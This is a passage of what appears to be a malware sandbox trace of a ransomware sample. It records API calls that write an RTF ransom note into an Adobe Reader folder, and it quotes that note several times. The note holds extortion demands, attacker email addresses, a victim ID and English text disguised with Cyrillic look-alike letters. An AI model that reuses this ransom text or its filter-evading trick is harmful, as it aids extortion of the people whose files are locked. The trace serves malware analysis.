t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.378] WriteFile (in: hFile=0x1fc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.523] CloseHandle (hObject=0x1fc) returned 1 [0064.524] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\bg85_info.rtf")) returned 0xffffffff [0064.524] GetLastError () returned 0x2 [0064.524] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\CHS\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\chs\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.524] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 